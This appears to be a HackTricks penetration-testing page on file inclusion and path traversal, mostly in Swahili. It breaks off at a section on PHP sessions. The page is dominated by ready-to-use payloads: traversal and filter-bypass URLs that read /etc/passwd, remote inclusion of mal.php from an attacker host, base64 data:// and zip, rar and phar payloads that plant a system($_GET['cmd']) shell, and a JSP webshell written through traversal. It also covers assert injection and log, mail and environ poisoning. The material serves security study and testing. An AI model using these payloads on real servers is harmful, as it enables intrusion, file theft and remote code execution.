# File Inclusion/Path traversal

{{#include ../../banners/hacktricks-training.md}}

## File Inclusion

**Remote File Inclusion (RFI):** Faili inapakuliwa kutoka server ya mbali (Bora: Unaweza kuandika code na server itaitekeleza). Katika PHP hii imezimwa kwa chaguo-msingi (**allow_url_include**).\
**Local File Inclusion (LFI):** Server inapakua faili ya ndani.

Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili itakayopakiwa na server.

**PHP functions** zilizo hatarini: require, require_once, include, include_once

Chombo kizuri cha ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)

## Blind - Interesting - LFI2RCE files
```python
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```
### **Linux**

**Baada ya kuchanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, niliunda hii:**


{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}

Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuongeza `../../../../../`

Orodha inayotumia mbinu kadhaa kupata faili /etc/password (ili kukagua kama udhaifu upo) inapatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)

### **Windows**

Mchanganyiko wa wordlists tofauti:


{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}

Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuondoa `C:/` na kuongeza `../../../../../`

Orodha inayotumia mbinu kadhaa kupata faili /boot.ini (ili kukagua kama udhaifu upo) inapatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)

### **OS X**

Angalia orodha ya LFI ya linux.

## Msingi wa LFI na bypasses

Mfano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
```
http://example.com/index.php?page=../../../etc/passwd
```
### traversal sequences zimeondolewa bila kutumia recursion
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**

Bypass kuongeza herufi zaidi mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
Hii **imetatuliwa tangu PHP 5.4**

### **Encoding**

Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na nyingine):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### Kutoka kwenye kabrasha iliyopo

Labda back-end inakagua njia ya kabrasha:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Kuchunguza saraka za mfumo wa faili kwenye seva

Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unajumuisha kubaini kina cha saraka na kuchunguza uwepo wa saraka maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:

1. **Tambua Kina cha Saraka:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili `/etc/passwd` (inayotumika ikiwa seva inategemea Linux). Mfano wa URL unaweza kutengenezwa kama ifuatavyo, ukionyesha kina cha tatu:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Chunguza Folda:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi kwenye `/etc/passwd`. Ngazi ya ziada ya directory inahitaji kuongeza depth kwa moja:
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **Tafsiri Matokeo:** Jibu la seva linaonyesha ikiwa kabrasha lipo:
- **Hitilafu / Hakuna Matokeo:** Kabrasha `private` huenda halipo mahali ulilotajwa.
- **Maudhui ya `/etc/passwd`:** Upo wa kabrasha `private` umethibitishwa.
4. **Uchunguzi wa Kurudia:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa saraka ndogo au faili kwa kutumia mbinu ile ile au njia za kawaida za Local File Inclusion (LFI).

Kwa kuchunguza saraka katika maeneo tofauti kwenye mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kukagua kama `/var/www/` ina kabrasha `private` (ikiwa saraka ya sasa iko kwa kina cha 3), tumia:
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**

Path truncation ni mbinu inayotumika kubadilisha njia za faili katika program za wavuti. Mara nyingi hutumika kufikia faili zilizokatwa kwa kuruka baadhi ya hatua za usalama ambazo huongeza herufi zaidi mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapobadilishwa na kipengele cha usalama, bado inaelekeza kwenye faili inayotakiwa.

Katika PHP, uwakilishi tofauti wa njia ya faili unaweza kutazamwa sawa kutokana na muundo wa mfumo wa faili. Kwa mfano:

- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` are all treated as the same path.
- Wakati herufi 6 za mwisho ni `passwd`, kuongeza `/` (kuwa `passwd/`) haibadilishi faili linalolengwa.
- Vivyo hivyo, ikiwa `.php` imeongezwa kwenye njia ya faili (kama `shellcode.php`), kuongeza `/.` mwishoni haitabadilisha faili inayofunguliwa.

Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na yaliyomo nyeti (taarifa za akaunti za watumiaji):
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
```

```
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
Katika matukio haya, idadi ya traversals inayohitajika inaweza kuwa takriban 2027, lakini idadi hii inaweza kubadilika kulingana na usanidi wa server.

- **Kutumia Dot Segments na Characters Za Ziada**: Traversal sequences (`../`) zilizochanganywa na dot segments za ziada na characters zinaweza kutumika kusogea kwenye file system, kwa ufanisi zikimpuuza server kuambatisha strings zilizoongezwa.
- **Kukadiria Idadi ya Traversals Zinazohitajika**: Kupitia jaribio na makosa, mtu anaweza kupata idadi sahihi ya `../` zinazohitajika kufika root directory na kisha `/etc/passwd`, kuhakikisha kwamba strings zilizoongezwa (kama `.php`) zimetolewa lakini path inayotakikana (`/etc/passwd`) inabaki kamili.
- **Kuanza na Fake Directory**: Ni desturi ya kawaida kuanza path na directory isiyopo (kama `a/`). Mbinu hii hutumiwa kama tahadhari au kutimiza mahitaji ya logic ya server katika utoaji maana wa paths.

Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya server ya kutafsiri paths na muundo wa filesystem. Kila tukio linaweza kuhitaji mbinu tofauti, na upimaji mara nyingi unahitajika ili kupata njia yenye ufanisi zaidi.

**This vulnerability was corrected in PHP 5.3.**

### **Filter bypass tricks**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion

Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inahitaji kuwa **On** ili ifanye kazi, na katika hali hiyo unaweza kujumuisha faili la PHP kutoka kwenye server yako na kupata RCE:
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP inafanya **filtering** kwa ufikaji wa kurasa za wavuti za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano protokoli ya data na base64 ku-decode code ya PHP iliyokuwa b64 na kupata RCE:
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
> [!TIP]
> Katika msimbo uliotangulia, `+.txt` ya mwisho iliongezwa kwa sababu attacker alihitaji string iliyoishia kwa `.txt`, hivyo string inaishia nayo na baada ya b64 decode sehemu hiyo itarudisha tu takataka na code halisi ya PHP itajumuishwa (na kwa hivyo, itatekelezwa).
>
> Mfano mwingine **bila kutumia protocol ya `php://`** ungekuwa:
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
## Kipengele mzizi la Python

Katika Python, msimbo kama huu:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
Ikiwa mtumiaji atapitisha **absolute path** kwa **`file_name`**, **njia ya awali inaondolewa tu**:
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
Hii ni tabia iliyokusudiwa kulingana na [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):

> Ikiwa kipengee ni absolute path, vipengele vyote vya awali vinatupwa na kuunganishwa kunaendelea kutoka kwenye kipengee cha absolute path.

## Java: Orodha za directories

Inaonekana kwamba ikiwa una Path Traversal katika Java na unaomba **directory** badala ya faili, **orodha ya directory inarudishwa**. Hii haitatokea katika lugha nyingine (afaik).

## Vigezo 25 Bora

Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
```
## LFI / RFI kutumia PHP wrappers na protokoli

### php://filter

PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data** kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:

- [String Filters](https://www.php.net/manual/en/filters.string.php):
- `string.rot13`
- `string.toupper`
- `string.tolower`
- `string.strip_tags`: Ondoa tags kutoka kwenye data (kila kitu kati ya herufi "<" na ">" )
- Note that this filter has disappear from the modern versions of PHP
- [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
- `convert.base64-encode`
- `convert.base64-decode`
- `convert.quoted-printable-encode`
- `convert.quoted-printable-decode`
- `convert.iconv.*` : Inabadilisha kuwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya encodings zote** zinazoungwa mkono endesha kwenye console: `iconv -l`

> [!WARNING]
> Abusing the `convert.iconv.*` conversion filter you can **generate arbitrary text**, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).

- [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
- `zlib.deflate`: Inabana maudhui (useful if exfiltrating a lot of info)
- `zlib.inflate`: Inafungua data iliyobanwa
- [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
- `mcrypt.*` : Imepitwa
- `mdecrypt.*` : Imepitwa
- Other Filters
- Ukiendesha katika PHP `var_dump(stream_get_filters());` utaweza kupata baadhi ya **filters zisizotarajiwa**:
- `consumed`
- `dechunk`: hurejesha HTTP chunked encoding
- `convert.*`
```php
# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
> [!WARNING]
> Sehemu "php://filter" haizingatii herufi kubwa/ndogo

### Kutumia php filters as oracle kusoma faili yoyote

[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) inatoa mbinu ya kusoma faili ya ndani bila kupata output kurudishwa na server. Mbinu hii inategemea boolean exfiltration of the file (char by char) using php filters as oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya text kuwa kubwa vya kutosha ili php itoke na exception.

Katika post ya awali kuna maelezo ya kina ya mbinu, lakini hapa kuna muhtasari mfupi:

- Tumia codec **`UCS-4LE`** ili kuweka herufi ya kwanza ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa kasi ya eksponenti.
- Hii itatumika kuzalisha **text kubwa sana ikiwa herufi ya mwanzo inakisia kwa usahihi** kiasi kwamba php itasababisha **error**
- The **dechunk** filter itakuwa **inaondoa kila kitu ikiwa char ya kwanza si hexadecimal**, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na ile ya awali (na filters nyingine kulingana na herufi inayokisiwa), itaturuhusu kukisia herufi mwanzoni mwa text kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe karakteri ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitaiondoa na bomu la awali litalifanya php kutoa error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano, kwa sababu tukitumia mara 6 codec hii a->b->c->d->e->f->g herufi haitakuwa tena karakteri ya hexadecimal, hivyo dechunk haitaiondoa na php error itachochewa kwa sababu inazidishwa na bomu la awali.
- Kwa kutumia transform nyingine kama **rot13** mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codec nyingine zinaweza kutumika kusogeza herufi nyingine katika hex range).
- Wakati char ya mwanzo ni namba inahitajika kuitumia base64 encode na leak herufi 2 za kwanza ili leak namba hiyo.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa herufi na kupata katika nafasi ya kwanza herufi nyingine za text.
- Na ili kuweza kupata **further data** wazo ni **kuzalisha 2 bytes za junk data mwanzoni** kwa kutumia **convert.iconv.UTF16.UTF16**, kisha tumia **UCS-4LE** ili kuifanya ipivot na 2 bytes zinazofuata, na delete data hadi kufikia junk data (hii itaondoa bytes 2 za kwanza za text ya mwanzo). Endelea kufanya hivyo hadi utakapofika sehemu unayotaka leak.

Katika post pia kulikuwa na tool ya kufanya hili moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).

### php://fd

Wrapper hii inaruhusu kufikia file descriptors ambazo process imezifungua. Inaweza kuwa muhimu exfiltrate yaliyomo ya opened files:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
Unaweza pia kutumia **php://stdin, php://stdout na php://stderr** kufikia **vitambulisho vya faili 0, 1 na 2** mtawalia (sijui jinsi hii inaweza kuwa ya msaada katika shambulio)

### zip:// and rar://

Pakia faili la Zip au Rar lenye PHPShell ndani na uifikie.\
Ili uweze kutumia rar protocol vibaya, lazima iwe **imeamilishwa maalum**.
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php
```
### data://
```
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
Kumbuka kwamba itifaki hii imezuiwa na mipangilio ya php **`allow_url_open`** na **`allow_url_include`**

### expect://

Expect lazima iwe imewezeshwa. Unaweza kutekeleza code ukitumia hii:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
### input://

Taja payload yako katika vigezo vya POST:
```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://

Faili la `.phar` linaweza kutumiwa kutekeleza msimbo wa PHP wakati programu ya wavuti inapotumia kazi kama `include` kwa ajili ya kupakia faili. Kipande cha msimbo wa PHP kilichoonyeshwa hapa chini kinaonyesha utengenezaji wa faili la `.phar`:
```php
<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
Ili kuunda faili ya `.phar`, amri ifuatayo inapaswa kutekelezwa:
```bash
php --define phar.readonly=0 create_path.php
```
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

Katika utekelezaji, faili inayoitwa `test.phar` itaundwa, ambayo inaweza kutumika ku-exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the `phar` protocol.

Katika kesi ambapo LFI inasoma tu faili bila kutekeleza PHP code ndani yake — kupitia functions kama `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, au `filesize()` — inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:

Kwa uelewa wa kina wa jinsi ya ku-exploit deserialization vulnerabilities katika muktadha wa faili za `.phar`, rejea hati iliyo linkiwa hapa chini:

[Phar Deserialization Exploitation Guide](phar-deserialization.md)


{{#ref}}
phar-deserialization.md
{{#endref}}

### CVE-2024-2961

It was possible to abuse **any arbitrary file read from PHP that supports php filters** to get a RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Very quick summary: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size in order to be able to **write anything in any address**, so a hook was added to call **`system`**.\
It was possible to alloc chunks of specific sizes abusing more php filters.

Ilikuwa inawezekana kutumia mbaya **any arbitrary file read from PHP that supports php filters** ili kupata RCE. Maelezo ya kina yanaweza ku [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** kwenye heap ya PHP ulitumiwa vibaya ili **alter the chain of free chunks** za ukubwa fulani ili kuweza **write anything in any address**, hivyo hook iliongezwa ili kuita **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia vibaya php filters zaidi.

### More protocols

Check more possible[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**

- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)  
  — Andika kwenye memory au kwenye faili ya muda (sijui jinsi hili linaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Accessing local filesystem  
  — Kupata local filesystem
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Accessing HTTP(s) URLs  
  — Kupata HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Accessing FTP(s) URLs  
  — Kupata FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams  
  — Compression Streams
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)  
  — Inatafuta pathnames zinazolingana na pattern (haiwezi kurudisha kitu kinachoweza kuchapishwa, kwa hivyo sio muhimu sana hapa)
- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2  
  — Secure Shell 2
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Not useful to read arbitrary files)  
  — Audio streams (Sio ya msaada kusoma arbitrary files)

## LFI via PHP's 'assert'

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.

Local File Inclusion (LFI) hatari katika PHP ni kubwa hasa wakati wa kushughulika na function ya 'assert', ambayo inaweza kutekeleza code iliyomo ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha wahusika wa directory traversal kama ".." inakaguliwa lakini haijasafishwa ipasavyo.

For example, PHP code might be designed to prevent directory traversal like so:

Kwa mfano, code ya PHP inaweza kubuniwa kuzuia directory traversal kama ifuatavyo:
```bash
assert("strpos('$file', '..') === false") or die("");
```
Ingawa hili linalenga kuzuia traversal, bila kutarajia linaunda njia ya code injection. Ili kutekeleza exploit hii kwa kusoma yaliyomo ya faili, mdukuzi anaweza kutumia:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
Vivyo hivyo, kwa kutekeleza amri zozote za mfumo, mtu anaweza kutumia:
```plaintext
' and die(system("id")) or '
```
Ni muhimu **URL-encode these payloads**.

## PHP Blind Path Traversal

> [!WARNING]
> Mbinu hii inahusiana na kesi ambapo wewe **control** njia ya **file path** ya **PHP function** ambayo itafanya **access a file** lakini hautaona yaliyomo ya faili (kama mwito rahisi kwa **`file()`**) na yaliyomo hayajaonyeshwa.

In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumika kupitia PHP filter kuweza **exfiltrate the content of a file via an error oracle**.

Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya faili kuwa **kubwa** kiasi kwamba **PHP function opening** faili itasababisha **error**.

Kisha, ili ku-leak char ya kwanza filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13** na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika ili **place other chars at the beggining and leak them**.

Functions that might be vulnerable: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`

Kwa maelezo ya kiufundi angalia makala iliyotajwa!

## LFI2RCE

### Arbitrary File Write via Path Traversal (Webshell RCE)

Wakati server-side code inayopokea/uploads faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, filename au URL) bila canonicalising na validating, segments za `..` na absolute paths zinaweza kutoroka directory lililokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya directory inayoweza kuonekana kwenye web, kawaida unapata unauthenticated RCE kwa ku-drop webshell.

Typical exploitation workflow:
- Tambua write primitive kwenye endpoint au background worker inayokubali path/filename na kuandika yaliyomo kwenye disk (mf. message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Baini web-exposed directories. Mifano ya kawaida:
  - Apache/PHP: `/var/www/html/`
  - Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
  - IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
- Tengeneza traversal path itakayochonga kutoka storage directory iliyokusudiwa hadi webroot, ukijumuisha webshell yako.
- Tembelea payload iliyowekwa na utekeleze amri.

Vidokezo:
- Service iliyo vunulika inayofanya write inaweza kusikiliza kwenye port isiyo-HTTP (mf. JMF XML listener kwenye TCP 4004). Portal kuu ya web (port tofauti) baadaye itahudumia payload yako.
- Katika Java stacks, file writes hizi mara nyingi zimetekelezwa kwa concatenation rahisi ya `File`/`Paths`. Ukosefu wa canonicalisation/allow-listing ndilo doa kuu.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>
```
Uimarishaji unaowazuia aina hii ya mdudu:
- Thibitisha njia kuwa canonical na idhibitishe kuwa ni tanzu ya directory ya msingi iliyoorodheshwa.
- Kataa njia yoyote yenye `..`, absolute roots, au drive letters; pendelea majina ya faili yaliyotengenezwa.
- Endesha writer kama akaunti yenye ruhusa ndogo na gawanya directory za kuandika kutoka kwa served roots.

## Remote File Inclusion

Imeelezewa hapo awali, [**follow this link**](#remote-file-inclusion).

### Via Apache/Nginx log file

Ikiwa server ya Apache au Nginx iko **nyeti kwa LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na kuingiza faili hiyo

> [!WARNING]
> Tambua kwamba **ikiwa utatumia double quotes** kwa shell badala ya **simple quotes**, double quotes zitasahihishwa kwa ajili ya string "_**quote;**_", **PHP itatoa error** hapo na **hakuna kitu kingine kitatekelezwa**.
>
> Pia, hakikisha unaandika **payload** kwa usahihi au PHP itatoa error kila mara itakapo jaribu kupakia faili ya log na hautakuwa na fursa ya pili.

Hii pia inaweza kufanywa katika logs nyingine lakini **kuwa mwangalifu,** code ndani ya logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" kwa Base64 na inakwekwa ndani ya logs. PHPShell inaweza kuingizwa ndani ya header hii.\
Other possible log paths:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)

### Kupitia Barua pepe

**Tuma barua** kwa akaunti ya ndani (user@localhost) yenye PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu kujumuisha barua ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**

### Kupitia /proc/*/fd/*

1. Pakia shells nyingi (kwa mfano: 100)
2. Jumuisha [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), ambapo $PID = PID ya mchakato (inaweza kupatikana kwa brute force) na $FD file descriptor (inaweza kupatikana kwa brute force pia)

### Kupitia /proc/self/environ

Kama faili ya log, tuma payload kwenye User-Agent; itaonekana ndani ya /proc/self/environ
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
### Kupitia upload

Ikiwa unaweza upload faili, just inject shell payload ndani yake (e.g : `<?php system($_GET['c']); ?>` ).
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
Ili kudumisha faili iwe rahisi kusoma, ni bora kuingiza katika metadata ya picha/doc/pdf

### Kupitia upakiaji wa Zip file

Upakia faili la ZIP lenye PHP shell iliyobanwa (compressed) kisha ufikie:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### Kupitia PHP sessions

Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)
```
